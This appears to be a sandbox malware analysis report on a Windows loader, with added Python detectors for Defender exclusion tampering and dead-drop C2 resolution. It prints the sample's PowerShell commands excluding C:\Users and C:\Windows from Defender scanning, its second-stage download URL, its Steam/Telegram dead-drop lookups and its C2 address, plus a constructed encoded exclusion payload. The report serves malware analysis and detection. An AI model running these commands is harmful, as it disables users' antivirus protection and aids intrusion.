
Windows Analysis Report
YYjRtxS70h.exe

Overview

General Information

Sample name: YYjRtxS70h.exe (renamed because the original name is a hash value)
Original sample name: 5a59ce92b07de68c0be8fbd7944214e2.exe
Analysis ID: 1579768
MD5: 5a59ce92b07de68c0be8fbd7944214e2
SHA1: b0536d674552c3a11a881b154b668af1b5222641
SHA256: e09ff2bd97040748812f0434e277b6623ac9aff565fc11003f9abfeeabe9110a
Tags: exe, user-abuse_ch

Detection

Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification (graph not reproduced in this text export)

Process Tree

  • System is w10x64
  • YYjRtxS70h.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\YYjRtxS70h.exe" MD5: 5A59CE92B07DE68C0BE8FBD7944214E2)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7556 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 8104 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • powershell.exe (PID: 5308 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Sigma matches on process start (three rules: two authored by Florian Roth (Nextron Systems), one by Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)), all on the same event:
  Command / CommandLine / ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
  CommandLine|base64offset|contains: ^
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 7556, ProcessName: powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\YYjRtxS70h.exe"
  ParentImage: C:\Users\user\Desktop\YYjRtxS70h.exe, ParentProcessId: 7424, ParentProcessName: YYjRtxS70h.exe
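The Sigma matches above all fire on one event: the sample starts PowerShell with an Add-MpPreference -ExclusionPath command. The process tree shows it doing so three times, first for its drop directory C:\spxzLeEJs and then for C:\Users and C:\Windows, which together remove user-writable and system locations from Defender real-time scanning. Each outer `"powershell.exe" powershell -Command ...` launch spawns a second powershell.exe that actually runs the cmdlet, so every exclusion appears twice in process telemetry. The detector below is an added example, not part of the report or of the Sigma rules it cites: it scans process-creation command lines for the plain and the base64 -EncodedCommand form of the cmdlet and rates each excluded path. The event records are constructed; the command lines for PIDs 7556, 7684, 8104 and 5308 are copied from the process tree, the encoded and benign records and the Sysmon-like field names are assumptions.

```python
"""Flag Windows Defender exclusion tampering in process-creation telemetry.

Added example, not part of the Joe Sandbox report or of the Sigma rules it cites.
Event records are constructed (simplified Sysmon EID 1 fields); the command lines
for PIDs 7556, 7684, 8104 and 5308 are copied from the report's process tree.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
# Argument value: quoted strings and/or bare tokens, comma separated, up to unquoted whitespace.
EXCLUSION_RE = re.compile(r"-Exclusion(Path|Process|Extension)\s+((?:'[^']*'|\"[^\"]*\"|[^\s'\",]+|,)+)", re.I)
ITEM_RE = re.compile(r"'[^']*'|\"[^\"]*\"|[^,]+")
# Exclusions that effectively switch real-time protection off for user and system space.
BROAD_PATHS = {"c:", "c:\\users", "c:\\windows", "c:\\programdata", "c:\\program files", "c:\\program files (x86)"}


@dataclass(frozen=True)
class Finding:
    pid: int
    ppid: int
    kind: str       # Path, Process or Extension
    value: str
    severity: str   # critical or high
    encoded: bool   # found inside a decoded -EncodedCommand payload


def decode_encoded_commands(cmdline: str) -> list[str]:
    """Decode every -e/-ec/.../-EncodedCommand argument (base64 of UTF-16LE text)."""
    tokens = cmdline.split()
    decoded = []
    for i, tok in enumerate(tokens[:-1]):
        flag = tok[1:].lower()
        # PowerShell accepts any prefix of -EncodedCommand; -ExecutionPolicy, -Command etc. are not prefixes.
        if tok[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            try:
                decoded.append(base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le"))
            except (ValueError, UnicodeDecodeError):
                pass  # not a base64 UTF-16LE payload
    return decoded


def exclusions_in(text: str) -> list[tuple[str, str]]:
    """(kind, value) for every -Exclusion* argument of an Add-/Set-MpPreference call in text."""
    if not CMDLET_RE.search(text):
        return []
    found = []
    for kind, raw in EXCLUSION_RE.findall(text):
        for item in ITEM_RE.findall(raw):
            value = item.strip("'\"").strip()
            if value:
                found.append((kind.capitalize(), value))
    return found


def rate(kind: str, value: str) -> str:
    """critical: a whole drive or the user/system tree; high: any other exclusion set from a command line."""
    if kind != "Path":
        return "high"
    norm = value.rstrip("\\").lower()
    if norm in BROAD_PATHS or re.fullmatch(r"[a-z]:", norm):
        return "critical"
    return "high"


def scan(events: list[dict]) -> list[Finding]:
    findings = []
    for ev in events:
        texts = [(ev["cmd"], False)] + [(p, True) for p in decode_encoded_commands(ev["cmd"])]
        for text, encoded in texts:
            for kind, value in exclusions_in(text):
                findings.append(Finding(ev["pid"], ev["ppid"], kind, value, rate(kind, value), encoded))
    return findings


# Constructed encoded payload (assumption, not from the sample) in the form the base64 Sigma rule targets.
ENCODED_PAYLOAD = base64.b64encode(
    "Set-MpPreference -ExclusionProcess 'svchost.exe' ; Add-MpPreference -ExclusionPath C:\\Users\\Public,D:\\".encode("utf-16le")
).decode()

EVENTS = [
    {"pid": 7424, "ppid": 4000, "cmd": r'"C:\Users\user\Desktop\YYjRtxS70h.exe"'},
    {"pid": 7556, "ppid": 7424, "cmd": r'''"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"'''},
    {"pid": 7684, "ppid": 7556, "cmd": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs'''},
    {"pid": 8104, "ppid": 7424, "cmd": r'''"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"'''},
    {"pid": 5308, "ppid": 7424, "cmd": r'''"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"'''},
    {"pid": 9001, "ppid": 7424, "cmd": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc " + ENCODED_PAYLOAD},  # constructed
    {"pid": 9002, "ppid": 600, "cmd": "powershell.exe -Command Get-MpPreference"},  # constructed, benign
]

if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"{f.severity:8} pid={f.pid} ppid={f.ppid} {f.kind}={f.value}{' (encoded)' if f.encoded else ''}")
```

On a host the same tampering is visible after the fact: `Get-MpPreference` lists ExclusionPath, ExclusionProcess and ExclusionExtension, and the Microsoft-Windows-Windows Defender/Operational log records event 5007 whenever the configuration changes, so a rule on 5007 events mentioning Exclusions catches variants that avoid powershell.exe altogether (WMI, the MpPreference COM path, or a registry write under the Windows Defender\Exclusions keys).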
Timestamp                        SID      Severity  Classtype        Source IP    Src port  Destination IP  Dst port  Protocol
2024-12-23T09:01:51.144550+0100  2028765  3         Unknown Traffic  192.168.2.4  49801     37.27.43.98     443       TCP
2024-12-23T09:02:27.809321+0100  2028765  3         Unknown Traffic  192.168.2.4  49880     37.27.43.98     443       TCP
2024-12-23T09:03:04.237595+0100  2028765  3         Unknown Traffic  192.168.2.4  49964     37.27.43.98     443       TCP

AV Detection

Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | ReversingLabs: Detection: 63%
Source: YYjRtxS70h.exe | Virustotal: Detection: 62%
Source: YYjRtxS70h.exe | ReversingLabs: Detection: 65%
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Joe Sandbox ML: detected
Source: YYjRtxS70h.exe | Joe Sandbox ML: detected
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_0041FC3B CryptStringToBinaryA,CryptStringToBinaryA | 15_2_0041FC3B
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49958 version: TLS 1.2
Source: YYjRtxS70h.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb | source: YYjRtxS70h.exe
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_0041E359 FindFirstFileA,FindFirstFileA | 15_2_0041E359
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_00420370 FindFirstFileA,FindFirstFileA | 15_2_00420370
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_0042498B FindFirstFileA,FindFirstFileA | 15_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_02AD2309
Source: global traffic | HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /m3wm0w HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /m3wm0w HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: global traffic | HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic | HTTP traffic detected: GET /m3wm0w HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: global traffic | HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
Source: global traffic | HTTP traffic detected: GET /m3wm0w HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
Source: Joe Sandbox View | IP Address: 185.199.109.133
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49801 -> 37.27.43.98:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49880 -> 37.27.43.98:443
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49964 -> 37.27.43.98:443
Source: unknown | TCP traffic detected without corresponding DNS query: 37.27.43.98 (12 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Code function: 15_2_00418024 InternetReadFile | 15_2_00418024
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.co! equals www.youtube.com (Youtube)
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.co!!Y< equals www.youtube.com (Youtube)
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
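Read together, the network evidence in this section is one chain: the sample fetches jtkhikadjthsad.exe from the GitHub repository olosha1/pockket and drops it as C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe; that second stage requests a Telegram channel page (t.me/m3wm0w) and a Steam profile (steamcommunity.com/profiles/76561199804377619); the saved profile page 76561199804377619[1].htm contains the string https://37.27.43.98 (see the "String found in binary or memory" entries further down), and the process then opens repeated TLS connections to 37.27.43.98 without any DNS lookup. A public profile used to hand out the C2 address this way is a dead-drop resolver: blocking steamcommunity.com or t.me does not help, and the operator rotates the IP by editing the profile. The parser below is an added example, not part of the report or of Joe Sandbox. It reads evidence lines in the form shown in this section (the sample lines are copied from here, plus one powershell.exe baseline line) and performs that correlation. Two conventions are assumptions of the example: a source ending in ".dr" is read as a dropped file, and strings from powershell.exe memory dumps are treated as interpreter baseline rather than sample IOCs.

```python
"""Rebuild the network chain from the evidence lines of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox. Sample lines are copied
from this report section; the powershell.exe line stands in for the interpreter
baseline strings (crl.microsoft.com, nuget.org, ...) the report also lists.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

HTTP_RE = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]\s*\|?\s*Host: ([a-z0-9.\-]+)")
NODNS_RE = re.compile(r"without corresponding DNS query: (\d+\.\d+\.\d+\.\d+)(?: \((\d+) occurrences\))?")
DNS_RE = re.compile(r"DNS traffic detected: DNS query: ([a-z0-9.\-]+)")
STRING_RE = re.compile(r"^Source: (.+?)\s*\|?\s*String found in binary or memory: (\S+)")
BASELINE = {("process", "powershell.exe"), ("process", "conhost.exe")}   # assumption: interpreter noise


@dataclass
class NetworkEvidence:
    requests: list[tuple[str, str, str]] = field(default_factory=list)   # (method, host, path)
    dns_queries: set[str] = field(default_factory=set)
    no_dns_ips: dict[str, int] = field(default_factory=dict)             # ip -> connection count
    strings: list[tuple[str, str]] = field(default_factory=list)         # (source, url)


def parse_report_lines(text: str) -> NetworkEvidence:
    ev = NetworkEvidence()
    for line in text.splitlines():
        m = HTTP_RE.search(line)
        if m:
            method, path, host = m.groups()
            ev.requests.append((method, host, path))
            continue
        m = NODNS_RE.search(line)             # checked before DNS_RE: both contain "DNS query:"
        if m:
            ip, count = m.group(1), int(m.group(2) or 1)
            ev.no_dns_ips[ip] = ev.no_dns_ips.get(ip, 0) + count
            continue
        m = DNS_RE.search(line)
        if m:
            ev.dns_queries.add(m.group(1))
            continue
        m = STRING_RE.match(line)
        if m:
            ev.strings.append((m.group(1).strip(), m.group(2)))
    return ev


def source_kind(source: str) -> tuple[str, str]:
    """('dropped', base name) for a .dr file (assumed Joe Sandbox suffix), else ('process', image)."""
    if source.endswith(".dr"):
        return "dropped", source.split("[")[0]
    return "process", source.split(",")[0].strip()


def sample_strings(ev: NetworkEvidence) -> list[tuple[str, str]]:
    """Strings attributable to the sample and its dropped files, interpreter baseline removed."""
    return [(s, u) for s, u in ev.strings if source_kind(s) not in BASELINE]


def payload_downloads(ev: NetworkEvidence) -> list[str]:
    """host/path of every requested object with an executable-looking suffix."""
    return [h + p for _, h, p in ev.requests if p.lower().endswith((".exe", ".dll", ".ps1", ".zip"))]


def dead_drop_candidates(ev: NetworkEvidence) -> list[dict]:
    """Bare-IP URLs found in sample artifacts whose IP was then contacted without a DNS lookup."""
    out, seen = [], set()
    for source, url in sample_strings(ev):
        host = urlsplit(url).hostname
        if not host:
            continue
        try:
            ipaddress.ip_address(host)
        except ValueError:
            continue                                    # a hostname, not an IP literal
        if host not in ev.no_dns_ips or (host, source) in seen:
            continue
        seen.add((host, source))
        kind, name = source_kind(source)
        resolver = None
        if kind == "dropped":                           # which request fetched the page the IP sits in?
            for _, rhost, rpath in ev.requests:
                if rpath.rstrip("/").rsplit("/", 1)[-1] == name:
                    resolver = rhost
        out.append({"c2": host, "contacts_without_dns": ev.no_dns_ips[host], "artifact": source, "resolver": resolver})
    return out


REPORT_LINES = """\
Source: global traffic | HTTP traffic detected: GET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /m3wm0w HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /profiles/76561199804377619 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: unknown | TCP traffic detected without corresponding DNS query: 37.27.43.98 (12 occurrences)
Source: 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://37.27.43.98
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://37.27.43.98/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
"""

if __name__ == "__main__":
    evidence = parse_report_lines(REPORT_LINES)
    print("payloads:", payload_downloads(evidence))
    print("dead drops:", dead_drop_candidates(evidence))
```

The IP, not the profile or channel URL, is the indicator worth blocking; the profile and channel identifiers are worth watching because the operator will keep them and change the IP.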
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 0000000E.00000002.2326236200.0000000002C6E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000009.00000002.2185543036.0000000002F9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microhb
Source: powershell.exe, 00000004.00000002.2028077606.0000000007DC2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.comd
Source: powershell.exe, 0000000B.00000002.2153183743.00000000033E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.mic&ZX
Source: powershell.exe, 00000004.00000002.2023765180.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2172468220.000000000626C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002DAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: YYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2031133778.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2021300435.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.st
